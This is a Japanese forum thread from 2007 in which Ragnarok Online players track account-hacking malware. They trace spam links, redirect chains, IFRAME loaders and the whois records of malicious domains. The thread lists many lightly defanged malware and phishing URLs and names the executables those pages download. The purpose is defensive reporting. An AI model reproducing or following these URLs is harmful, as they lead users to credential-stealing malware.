6503:Ro 公式ページRo 狩場 Ro 武器、防具製作■ > http://www■ro-bot■net/10657/ (2007/04/04 19:17:57)
6502:ひっとん > 神器材料買取してます、何かあればお声をおかけください。http://nikang■blog79■fc2■com (2007/04/04 13:10:10)
6501:ひっとん > RO歴史の上で最も変態の装備．http://bqdr■blog98■fc2■com (2007/04/04 13:09:16)
6499:井上晴美 > http://www■gsisdokf■net/online/ (2007/04/03 22:50:45)
6498:井上晴美 > http://www■gsisdokf■net/online/ (2007/04/03 22:50:42)
6496:夏木彩 > 渚音楽祭2007春 の情報はもちろん、プレゼントやアーティストの最新情報もチェックできるYO-CHECK（ヨーガク★チェック）の登録はこちらから！http://urpoka■blog75■fc2■com/ (2007/04/03 21:49:43)
6495:渡辺潤 > 完全収録女子高校美女ギリギリモザイク　バコバコhttp://www■ragnarokonline1■com/ro■htm (2007/04/03 14:52:01)
6493:ＭＭＯファイナンス > 天国の装備は売買しますhttp://www■blog-livedoor■net/game/ (2007/04/03 11:51:57)
6475:愛よりSEX > オナニーから生身の女性のマ○コで発射するのが当たり前の生活http://www■18girl-av■com/bbs/ (2007/03/29 16:47:03)
6416:シルヴィア > :レイド討伐隊 > 韓国攻略情報 http://www■hosetaibei■com/bbs/ (2007/03/23 21:41:59)
6413:帝国の誉れ > LINEAGE1商人:http://www■asdsdgh-jp■com/online/ (2007/03/23 10:56:51)
6407:レイド討伐隊 > 韓国攻略情報 http://www■RAGNAROX■mobi/bbs (2007/03/22 20:51:25)
6404:sdsad > 友たちはよい　http://www■rokonline-jp■com/blog (2007/03/22 14:57:38)
6371:ネ申のテンプレ > http://www■rokonline-jp■com/blog (2007/03/20 17:56:47)
6368:天国の装備は売買します > 本人は長期にわたり天国の遊ぶ各種の装備を売って、中の伝言を招く装備しなければならないのがあって、ウェブサイトの中に本人の連絡用電話があります:http://www■netgamelivedoor■com/online/ (2007/03/20 13:13:07)
6363:浅倉響一 > 通行する小さいこつ!http://www■biglobe-ne■com/bbs/ (2007/03/19 21:35:56)
6358: 櫻井孝宏 > http://www■conecojp■net/online/ (2007/03/19 12:41:14)
6329:クリ剣士 > http://www■game-fc2blog■com/chaos (2007/03/17 15:06:20)
6327:武器と防具を精錬する鍛冶屋さん > http://www■interzq■com/bbs (2007/03/16 16:05:22)
6326:ROは格闘する > http://www■din-or■com/bbs (2007/03/16 16:04:33)
6325:や攻撃などの > 商人の装備品 http://www■game-fc2blog■com/chaos (2007/03/15 10:42:42)
6324:や攻撃などの > 　商人の装備品 http://www■game-fc2blog■com/chaos (2007/03/15 10:41:33)
6322:ro狩場 > 詳しくは:http://www■biglobe-ne■com/bbs (2007/03/14 18:16:01)
6321:小説系置き場　割とメインコンテンツ > http://www■6828teacup■com/bbs (2007/03/14 12:57:41)
6316:資産10Gオーバーらしい > http://www■interzq■com/bbs (2007/03/12 20:43:16)
6312:商業ロック > 商業ロック http://www■6828teacup■com/bbs (2007/03/12 18:20:52)
6311:紫苑 > 販売 +4錐 http://www■lineagecojp■com/rolink/ (2007/03/12 18:02:44)

507 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 11:51 ID:jJj6ioBI0

そういや昨日、未実装Wikiの「神器」ページが改ざんされてた。
既存の垢ハックURLで文字列置換処理されてたので被害は全くなかったはずだが。
改ざんされた時間はたしか4/8の18時〜19時代。
その時間のログから管理人さん処分よろしく。

508 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 11:54 ID:kMUZqm3J0

アカハック蔓延し過ぎでﾜﾛﾀ。

509 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 11:58 ID:DvDjRiVl0

>>507
該当Wikiのコメントに書かないとだめだろ。ここじゃWIkiの管理人さんが見てるかどうか不明。

510 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 15:18 ID:6b7wqa2W0

>>506
サイト自体放置だが、もうこれは閉鎖した方がいいよな・・。

511 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 15:25 ID:DvDjRiVl0

>>510
BBS見に行く人は稀だし、リンクになってないので実害は出てないと思われ

512 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 18:09 ID:lyIojUXG0

>>510
逆に検体収集用BBSと思えば役に立つ

513 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 18:13 ID:DvDjRiVl0

>>512
御意ｗ

514 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 22:10 ID:Qq/xNHjJ0

BBSだけで済んでいるうちはいいけど、連中はサイトクラックによる乗っ取りも常套手段。
そういった意味では、畳んでしまった方が後腐れ無いとも言えなくもない……

515 ：(^ー^*)ノ〜さん sage ： 2007/04/09(月) 22:42 ID:yzeXn//00

昔から言われているけど、更新停止して放置されたサイトは危険だね。
ただのHTMLならともかくBBSやWikiはとっとと閉鎖したほうがいい。

516 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 06:34 ID:Uz/BNsh30

中華の新作らしきモノ。fm7■biz自体は転送サービスのドメインらしい。

-------------------------------------
Ro 装備. 血盟すれっど
陽光RO会社 URL:　http■//fm7■biz/1tdp
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
＞記事全文まとめ。
＞雑誌記事の取り込み画像
http■//fm7■biz/1ygi

517 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 07:04 ID:9+p53y4S0

>>516
しらべてみた。
http://fm7■biz/1ygi
　→　http://www■jprmthome■com/index■htm
　→　http://www■jprmthome■com/muxiao1■jpg,
　　　http://www■jprmthome■com/muxiao2■jpg

画像は先日の.aniに関する奴を使った物。

一応fm7.bizのフォームから通報してみた。

518 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 07:45 ID:LEIiwyJ50

>>517
http://fm7■biz/1tdp についてHTTPのヘッダを調べてみた。

HTTP/1.x 302 Found
(中略)
Location: http://www■gemnnammobbs■com

Locationヘッダが仕込まれてる。これ自体は転送サービスの正規の機能のようだけど、
このLocationヘッダってやつは、HTMLソースを表示しても当然出てこないし、(ソースチェッカーでは分かる)
スクリプトや自動ジャンプをOFF(※)にしてようが絶対に飛ぶので、なかなかやっかいだな。
Locationヘッダを無効にする設定ってあるんだろうか？

※IEだと、[ツール]-[インターネットオプション]-[セキュリティ]
-[レベルのカスタマイズ]-[ページの自動読み込み]-[無効にする]
Firefoxだと拡張機能RefreshBlockerなど

519 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 13:39 ID:cyq5zIgN0

ヘッダ上にあるんなら、ProxNの対応コードがあれば楽に防げるじゃない？

俺には今一理解できないから書けないが。

520 ：518 sage ： 2007/04/10(火) 15:55 ID:LEIiwyJ50

>>519
オミトロンか・・・うーん。便利そうではあるけど、敷居が高そうだなあ。
とりあえず、Firefoxでリダイレクトを無効にする方法を見つけたので、以下に掲載。
（リダイレクト＝HTTPヘッダ中のlocationで指定されたＵＲＬにジャンプすること）

１．アドレスバーにabout:configと入力する
２．network.http.redirection-limitという項目をダブルクリックする
３．ダイアログが表示されるので０と入力し、ＯＫを押す
（元に戻したい場合は、右クリックしてリセットを選べば良い）

内容を解説しておくと、まずアドレスバーにabout:configと入力すると
Firefoxで設定可能なパラメータの一覧が表示される。
network.http.redirection-limitというのは、HTTPヘッダでリダイレクト指示が来た場合に
リダイレクトを何回まで行うかという設定で、デフォルトでは２０に設定されている。
で、これを０に設定すると、リダイレクトを行なわないことになる。

無効にしたらしたで不便かもしれない。アドレスの最後に/が無いだけとかなら、確認なしで
リダイレクト。それ以外は確認ダイアログを表示してＯＫ押したら、リダイレクト
とかしたいところだが、そうなると敷居は高いが、拡張機能を自分で作るしかないか・・・
あるいはオミトロンか・・・

521 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 18:37 ID:NiEQtIo90

http://monoganac2■sakura.ne■jp/src/milktea14653■jpg
ROに関係ない場所にも大量に貼られているようだが
RO関係の場所にもいくつか狙ったかのように貼られてあったので怪しいかも分からんね

522 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 18:46 ID:Vey28yQW0

分からんレベルで張るなよ。

523 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 19:47 ID:hcbhX8Aw0

>>521
アダルトのUPろだに2ch_flash.jpgという名前の
「まともなRO関係のファイル」がUPされる可能性は限りなく0に近いかと

524 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 21:44 ID:R3JOKXmw0

ＢＯＴが各サイトにウイルスＵＲＬを書くことってあるの？

525 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 22:03 ID:/Jt3zlNd0

>524
BOTと言ってもROとウィルスを考えた場合は2種類ある。
1つはROのゲーム内に腐るほど沸いてるBOT。
1つはウィルス感染したPCが作るネットワーク。

前者のゲーム内のBOTが書くことはまず無い。
ROのID/PASSを2chかどこかに書く罠が仕込まれたBOTが昔あったらしいので
絶対にないとは言えないが、ほぼ無いに等しい。

後者のBOT(botnet)はウィルスに感染したPC群で構築されるネットワークで
PCの所有者が気がつかない間に書き込みに利用される。
ハッキングの踏み台にされたとか言われるのもこのケースだし、どこかの鯖を
墜とすために攻撃に使われたりする。
その時に使われる感染したPCの事をゾンビPCとか呼んだりする。

ウィルス関係の書き込みでBOTと言われるのは普通は後者の方。
Spamメールなんかはこれを使ってる事が多いし、WikiやBBSへの書き込みも
こういうゾンビPC経由が多いと言われてる。

526 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 22:14 ID:R3JOKXmw0

なるほどぉ
ＢＯＴネットを経由しないＢＯＴもいるのでしょうか？

例えばＰＣでネットサーフィンからＢＯＴ（自動化）でＲＯ・ラグナロクなどの単語が含まれるサイトに
自動でウィルスＵＲＬをうｐするとか

527 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 22:55 ID:Vey28yQW0

なんか分かっていない予感。

528 ：(^ー^*)ノ〜さん sage ： 2007/04/10(火) 23:43 ID:WaiojZlZ0

>>526
BOTネット使わずとも、そんなんは、自分とこでスクリプト動かすだけで事足りるよ。
セキュリティ一般の雑談にあたるので、LiveROの方が適切だと思う。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

529 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 17:17 ID:d0xY08KZ0

とうとう奴らと来たら何か書き込める場所と見れば
見境無く垢ハックURL書き込むようになった気配
ROと全く関係ないゲームの掲示板に垢ハックのURLが書いてあった
時には正直どうしようかと思ったわ・・・

530 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 19:28 ID:ypPOX6uN0

別にもう対策とかどうでもいいんじゃね？
サービス終了も近いんだしさ
被害届け出さなきゃ警察は一切動かないんだから、いっそ被害者になって（ｒｙ

531 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 19:42 ID:vF8WXMEQ0

はいは〜い
被害者になりました

僕捨て垢がハックされて
ジャベリン盗まれました

532 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 19:46 ID:ypPOX6uN0

それって動いてくれたん？だったら俺もやるわー

533 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 21:02 ID:vF8WXMEQ0

ジャベリンと2000ｚ盗まれたから
訴えてやるｗｗｗｗ

534 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 21:10 ID:4ild12Es0

>>529
つまり他のゲームユーザにはＲＯやらせないってことだな
なんという根本的垢ハック対策

535 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 21:52 ID:NFt2ewFc0

何か勘違いしているのかもしれんが、RO以外のネトゲやMixiなんかのパスも盗まれるよ。

536 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 22:50 ID:VQH5VMY30

最近のタイプは、TrojだけでなくBackDoor詰め合わせも増えている。
この手の物に感染すれば、被害者が加害者の立場になる事も容易。
mixiの運営している求職サイト「Find Job!」もDDoS攻撃を受けた。当然、攻撃の踏み台に選ばれる可能性だってある。
継続的に踏み台として使われ続ければ、契約ISPから強制解約を通告されるかも知れない。
それに、ある日ドアのチャイムがなったと思ったら、黒革の手帖を提示されるかもしれないよ。

537 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 23:12 ID:vF8WXMEQ0

中華必死だなぁｗｗｗ

そこまでしなきゃ滅びちゃうほど追い詰められてるのか？ｗ
みんなでどんどん追い詰めていけばそのうち消えてくれるかもな

538 ：(^ー^*)ノ〜さん sage ： 2007/04/11(水) 23:45 ID:jbWDk/2C0

Maran実装前のzhangweijp・lovetw系では
リネ・リネ2・RO・MSNメッセ(WindowsLiveメッセ)の
パス抜き4点詰め合わせが流行ったな。

aniについては欧米ではWoWのパス抜きが流行った
(と英BBCで報道されたとKasperskyのブログにあった)。
日本を含むアジアでは洋ゲーはあまり流行らんし、
世界各国で事情は意外と異なるもんだ。
たとえば南米ではネットでのクレカ番号入力が怖くてできないほど
銀行系の犯罪(フィッシング、バックドア、etc.)が多い。

539 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 00:21 ID:7mBNVtwN0

久しぶりにBOTNEWS見たけど、FFでの強烈な取締で
ROに大量に引っ越してきてるっぽいなぁ。
FFはパス抜きサイトが逆にユーザに書き換えられたりして
もろに人海戦術だったけど、ROはBOTもトロイもやりたい放題だしな…。

540 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 00:43 ID:T+LcE6iA0

>>539
垢ハックサイトを逆に乗っ取ったのか・・凄いな。

541 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 06:22 ID:J78f7Di+0

ROじゃもうそこまでやる熱意のある奴はいないだろうな

542 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 14:10 ID:PRKys3i40

もう惰性でやってる人しかいないんだからそりゃそうだ

543 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 14:27 ID:EPZVm8GJ0

>>517,518
転送サービス管理者に通報済みらしいけど、未だ生きてるっぽいね。
未処理なのかスルーされたのか。

544 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 21:40 ID:ee+hjMbl0

また自分の絵サイトに垢ハックが貼られていた。
www■gameyoou■com/cimg/index■htm

もういい加減にしてくれと…('A`)

545 ：(^ー^*)ノ〜さん sage ： 2007/04/12(木) 22:00 ID:1GmDczAF0

垢ハックのアドを貼る作業をしている中華のほとんどはＢＯＴだけどな
なんでも自動化されてるぜｗ

546 ：(^ー^*)ノ〜さん ： 2007/04/13(金) 10:05 ID:3hkBHQQA0

無差別爆撃から察するに、ROなんか全然やってないひとも当たり前のように被害受けてるんだよな・・・
こりゃもう、ポリンの着ぐるみで温家宝にご注進してくるしかねえな。おまえらＴＶ見とけよ。

547 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 10:46 ID:NjFPc/VjO

垢ハック食らってるMMOの運営数社集まって出るとこ出たらなんとかなりそうな気がしないでもない

548 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 11:56 ID:rl5cpY0w0

癌呆には100％期待できないがな。

549 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 12:12 ID:ok72DuZV0

ゲームってことで一般的な認識薄いけど大金動いて組織的な犯罪だしな。
他社の対応には期待したい。
言ってて情けないが。

550 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 12:34 ID:mSuKlgl4O

管理会社、ユーザ含めて反撃食らう可能性の低く、かつ引っ掛かってくれる人が大量にいる、いわば低能集団は絶好の狙い目

551 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 13:40 ID:jACKsZRt0

あっちからすれば罠踏ませといて損はないからな。
そら無差別にもなるだろう。

552 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 14:20 ID:4WmeC6eX0

大金って幾らくらい動いてるんだ？

553 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 14:38 ID:Z12wlUtv0

これを機にコンシューマに流れていく方に俺は掛けるな
ＭＭＯ自体が下火になるんじゃね、法整備も遅れてるし

554 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 14:55 ID:k8F92G2D0

ここまで無差別に広がってるのに何も対策しない癌ﾜﾛｽｗｗｗｗ
対策どころかアイテム課金でいかに集金するかしかやってないし

555 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 15:00 ID:4LK1S/gl0

誰かWEBヘルプデスクにどうなのか投稿してないのか？

556 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 15:20 ID:1+DsORfD0

被害あったと通報してくれれば被害があったと確認取れたら
アイテムなどはできる限り戻します。とテンプレくさいのは帰ってきた。
しかし前に来た報告だと8ヶ月かかったとか言う話もあるし、あまりにも遅いな。

このままだと今後全てのネトゲがどんな良いもの出て来ても常時垢ハックが纏わりつくな･･･
ネトゲの未来は暗い。

557 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 15:22 ID:4LK1S/gl0

あーすまん被害の前に
こんだけ垢ハックサイトが大量にあるのに警戒告知をださないんですか？
とかそういう文を送ってみた奴はいないのかなと
様子見て出してみるか

558 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 15:44 ID:1wi4W34H0

>>556
最初からハックしてもうまみのないシステムにしておけばいいんだけどな。
資産がいくらあるとかじゃなく、ゲームとしての面白さを純粋に追求すればいいと思うんだが・・・

559 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 19:57 ID:Z12wlUtv0

ＲＭＴにしろＢＯＴにしろほとんど意味が無いってＭＭＯは出てるけどな
ＲＯはそのあたりのシステムが最悪だ、やるなって方が難しいと思う
ＥＸＰ１００倍、ドロップ率１００倍、垢ハックされてもすぐにアイテム
保障ぐらいならなんとかなるかもな
レベルあがってすぐ飽きる？
そりゃゲームとしての楽しみがそれしかないだけであってコンテンツが貧弱なんだろう
色々追加すりゃいいのにね、こける要素満載なＲＯ２なんてどうでもいいからさ

560 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 20:07 ID:UyKwP8BY0

RMTを防止するにはゲーム内経済構造から設計する必要がある
その他、ROの長大な桁数の金額を所持する事が可能な点と膨大な倉庫枠はむしろ欠陥

他のゲームを引き合いに出すのもあれだけど
対RMTを意識した経済構造を持つゲームは複数ある（チョン・シナ製ではない）

561 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 20:31 ID:6DAlDwm+0

http://app■cocolog-nifty■com/t/comments?__mode=red&id=12886212

知り合い周りにどかっと書き込まれてました
チェッカーかけたら
http://www■gameurdr■com/ink007996277/
に飛ばされるようですが…

アドレス見る限りコメントへのリンクに感じますし
内容次第では自然に踏んでしまう可能性も。
ココログの報告は初なのかな？

562 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 20:46 ID:zvfaNwqP0

>>559
エミュかよ

てかエミュでも垢ハックの事件は起きてるぜ
中華はＲＭＴによる金儲けのための本鯖でしか垢ハックしないだろうけどな。

563 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 21:11 ID:OZYUw72U0

>>552
何年か前の数字だけど、RMT市場はアメリカと韓国が1000億円、
日本が100億円だった(MSN配下になる前の毎日新聞の記事)。
この2000億円以上の仮想通貨(ゼニーとかアデナとかギルとか)の多くが中国産。
BOTや肉入りのゴールドファーマーがほとんどだと思うので、
ハッキングによるものは1割あるかないかじゃないかな。
ちなみに2000億円という数字は世界のゲームソフト市場の1割に匹敵する
(2兆円市場。オンライン・オフライン、PC・携帯電話・コンシューマを問わない)。

564 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 21:13 ID:x/SWAz6+0

カスペルスキーの体験版を導入したところ、
Exploit.HTML.Mht（動作分類 ハックツール(Exploit）というのが大量に出てきました
駆除ができませんでしたと出てしまうのですが、
これはすでに垢ハックされてしまっている可能性があるのでしょうか？

565 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 21:48 ID:k8F92G2D0

駆除したければ製品版買えやって事だろ

566 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 22:16 ID:ok72DuZV0

>>557
先月送った。癌社員の不正の上にでも注意書き載せろつって。
今のところ音沙汰なし。

567 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 22:16 ID:zvfaNwqP0

カスペルスキー様がばら撒いたウィルスだしなｗｗｗ

568 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 22:18 ID:ok72DuZV0

でもこういうのは数勝負なとこもあるから、投稿増えればなんとか動いてくれんかなー。
もしくはこういうのってセキュリティ系のなんかそういう組織とかがケツ叩いたりはしてくれんのだろうか。

569 ：(^ー^*)ノ〜さん sage ： 2007/04/13(金) 22:36 ID:1ZUVdZC30

「BOT対策頑張ってます」（ｷﾘｯ）
で終わりだろ

570 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 01:13 ID:S9lS6rXX0

>>561
報告お疲れ

とりあえずniftyに報告汁
ここでいうよりniftyに言うほうがずっと早い

571 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 03:30 ID:UxEWV1ko0

【　　アドレス 　 】 http://tiamet■sakura.ne■jp/south/futab■.htm
　　　　　　　　　　　もしくはhttp://tiamet■sakura.ne■jp/lovelovelemon/futaba■htm
【気付いた日時】 4/14　02時半ごろ
【　 　　 OS　 　 】 Windows XP media Center Edition
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/12の自動更新だったと思います
【　アンチウイルスソフト 】フレッツ光を導入したときについてきたセキュリティ対策ツール
　　　　　　　　　　　　　　　　というもの
【その他のSecurty対策 】
【 ウイルススキャン結果】 カスペルスキーのオンラインスキャン
　　　　　　　　　　　　　　　　
【スレログやテンプレを読んだか】 Yes/
【説明】Ｔｉａの某南となかよし板のどちらかなんですが、どちらか忘れてしまいました。
　　　　某スレのアレのリンク部分からとんだとき、画面が真っ白になり、
　　　　驚いてＵＲＬを削ったら、ページは確かにＴｉａの某スレのアレだったようで、
　　　　もう一度同じアドレスを踏みなおしてみたらちゃんと通常のＢＢＳ画面が出てきました。
　　　　ただの何かのエラーで空白ページになっちゃったんだろう、と思いましたが
　　　　一応カスペでスキャンしてみたら Exploit.HTML.Mht というのに感染していたようです。
　　　　これがアカハックのウィルスと関係があるのか、ハズカシながらよく分かりません。
　　　　
スレ内を検索してみたら、564の方と同じのようですね。
その後のレスを見る限り、これは関係ない…という判断でいいのでしょうか。

572 ：571 sage ： 2007/04/14(土) 03:39 ID:UxEWV1ko0

んー、今再度1を読み返したら

重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

とありますね…。
質問にしてしまったのはここではマズかったでしょうか。
ご指摘あれば雑談スレ？のほうへ行きますが…。

573 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 03:42 ID:8F4NwBae0

Exploit.HTML.Mht

警告レベル： 緑(低)
別名
Exploit.HTML.Mht (Kaspersky Lab) は以下の名称でも知られています:
Exploit-MhtRedir.gen (McAfee), Exploit:HTML/MhtRedir.gen* (RAV), HTML/Exploit.Mhtml (H+BEDV), Exploit.HTML.MHTRedir.1n (ClamAV), Exploit/Mhtredir.gen (Panda)
登録日 2004年7月6日
動作分類 ハックツール(Exploit)
技術情報

このファィルは、Internet Explorer のセキュリティの脆弱性を使って、悪意があるプログラムをＰＣにダウンロードしてインストールするように試みるインストラクションを含んでいます。


古いものだしちゃんとWinupdateしてれば脆弱性は塞がれてると思うけどどうなんだろうね

574 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 04:10 ID:V0/GMzoO0

前のAssassinTemplateのトップに張ってある
http://wi■i.deny■jp/assas■in/
これはどうなんでしょうね
今のアサテンプレとURLが違うようなので怖かったんですが・・・

575 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 04:13 ID:8F4NwBae0

ここはURL鑑定スレじゃないとあれほど…
あと伏せるなら「.」を変えてくれないとわかりにくい

576 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 04:26 ID:V0/GMzoO0

すいませんorz
http://wiki■deny■jp/assassin/
何分あまりこういうこと詳しくないもので・・・
言い訳ですね、ゴメンナサイ・・・

577 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 04:58 ID:ZbiblCU00

サーバが見つからないと出るな。
すでに消された、ハックサイトかもしれん。

578 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 06:11 ID:wEmOrqJR0

>>577
お〜い、非道いってそれは。
それは前管理人時代のアサシン・モンクWikiのURLだ。
但し、whoisの情報を見る限りでは、管理者の引き継ぎが行われて以降、該当ドメインは失効し、新たに誰かが取得している。
現在のドメインオーナーについては、whoisの情報以上の詳細については完全に不明。

579 ：にゅぼーん にゅぼーん ： にゅぼーん

にゅぼーん

580 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 12:53 ID:pOJsF7qH0

アカハクドメインをぐぐっていると次のものを発見した。
www■gomeodc■com/mmkk■com

１４日当初、ClamWinで検知
mmkk■com: Trojan.Spy-2868 FOUND

その後のVIRUSTOTAL結果、これはひどい。
この時点でClamが検知しなくなったので入れ替えられたかもしれない。
キングに検体発射済み、と言うか簡単に送れる送付先そこしか知らん。
www.virustotal.com/vt/en/resultadof?39e8bf1282ed8cce69828d9bac207c56

www■gomeodc■com からは以下がIFRAMEで呼び出される。
www■vviccd520■com/img/mm■htm　スクリプト
www■vviccd520■com/img/mm■jpg　サイズ０で呼び出される単なる画像？

登録情報、福建人どものようですね。
Domain Name.......... gomeodc■com
Creation Date........ 2007-03-25 14:15:19
Registration Date.... 2007-03-25 14:15:19
Expiry Date.......... 2008-03-25 14:15:19
Organisation Name.... longdahaomengong shi
Organisation Address. longyanshizhongshanglu 33hao
Organisation Address.
Organisation Address. longyan
Organisation Address. 364000
Organisation Address. FJ
Organisation Address. CN

Domain Name ..................... vviccd520■com
Registrant Name ................. kuang zhang
Registrant Organization ......... lingfeng gongsi
Registrant Address .............. longyan lingfenggongsi
Registrant City ................. long yan
Registrant Province/State ....... FJ
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

581 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 14:32 ID:YQqOZHyk0

http://shidan■blog8■fc2■com/
ここを見たらすごく重くて、表示も変だったのですが大丈夫でしょうか・・Orz

582 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 14:43 ID:S9lS6rXX0

>>579は削除依頼出してきた。
という事で書き直し。

日時 ：2007-04-14 10:53:26
記事タイトル　：省略
▼記事を見る▼
http://ameblo■jp/*****/


URL：http://www■geocitylinks■com/games/
IP ：210.16.231.9

----ここまでが書かれた記事など（編集あり）

仕組み
すぐ　http://www■fanavier■net/games/server■exe　に飛ぶように仕掛けてる
ソースチェッカーで確認すると危険アドレスとは出るがウイルスとは認識してないから亜種と思われる


ちなみに今現在ソースチェックすると中文の404ページに飛ぶ

コメントはギルド紹介をそのまんまぱくったもの。

そういやラブログだっけ？それで作ったアメブロをそのまま使ってるんだけど、こういうの俺だけかな？
コメント承認以外防ぎようがない…('A`)


>>581
そんなあなたに

つ[ソースチェッカー]

人柱になってきたがチェッカーでも普通に見ても異常なし

583 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 15:37 ID:YQqOZHyk0

>>582
ありがとうございます。
どうしてかわかりませんが、そのサイトを見ようとするとPCがフリーズしそうなくらい重くなって表示もめちゃくちゃになるんです。
IEがおかしいのかな・・。何もなくて安心しました。

584 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 17:18 ID:Gcoysc9b0

>>エルク (07/04/14(Sat) 15:32) [ID:f9BkQo8z] #46754 [210.197.151.127]
>>127.151.197.210.in-addr.arpa name = OFSfb-21p4-127.ppp11.odn.ad.jp.
>>どうやら、ＲＯはまだまだ続くようで。
>>もう新規アップデートはないようなこと
>>言ってなかったっけ？
>>気のせいか。
>>とりあえず、新曲が出ているようで。
>>こちらで聴けます。
>>94.mp3〜97.mp3
>>http://***.soultaker***.***/******/（一部伏字処理）

776に貼ってあったらしいです。
詳細不明。
丁度韓国のＥＰ１２.1内容に関して少し情報が出たタイミングなのでこんな書き込みに注意。

585 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 20:59 ID:6MjjVsoi0

>>580
mm.jpg、500x375のエロ画像だった
(あっちの環境がクソなのでたまたま読み込めなかったものと思われ)。
他は今からいじってみますわ。
誰でも送れる検体送付先をある程度知ってるけど需要ある?

586 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 21:06 ID:6MjjVsoi0

続き。mm.htmは200kBほど(でかっ)のmmdd.exeを落とす…んだけど重い。
こいつが本体と思われ。ブラウザではたぶん無理、ダウンローダ推奨。

587 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 21:44 ID:6MjjVsoi0

>>582
現時点でそのserver.exeが存在しない(404)。

>>581
>>1 を読んで移動せよ。

588 ：(^ー^*)ノ〜さん ： 2007/04/14(土) 22:24 ID:4BEoDD4m0

不安なので投稿させてくださいorz

【　　アドレス 　 】 http://bqdr■blog98■fc2■com
【気付いた日時】 4/14 １６時頃
【　 　　 OS　 　 】 Windous XP Home Edition
【使用ブラウザ 】 ＩＥ
【WindowsUpdateの有無】 4/13
【　アンチウイルスソフト 】 なし。
【その他のSecurty対策 】 なし。
【 ウイルススキャン結果】 リアルタイムでやってます。
【スレログやテンプレを読んだか】 今から読みます。
【説明】
実は垢ハックされてないのですが、ついさっきＲＯ blogさんにあった警告を見て,
ヤバイと思って履歴を見たら普通に残ってましたorz
踏んだのは今週の月曜日なのですが,何もされていません。
毎日ログインしてましたが特に変わったことはありませんでした。
とりあえず、不安なのでパスワードだけ変更しておきました。
オンラインウィルス検索してみても何も出ませんでしたが,一応ＯＳ再インストールするべきでしょうか。。。

589 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 22:25 ID:Ls2oFjba0

>>585
>誰でも送れる検体送付先をある程度知ってるけど需要ある?
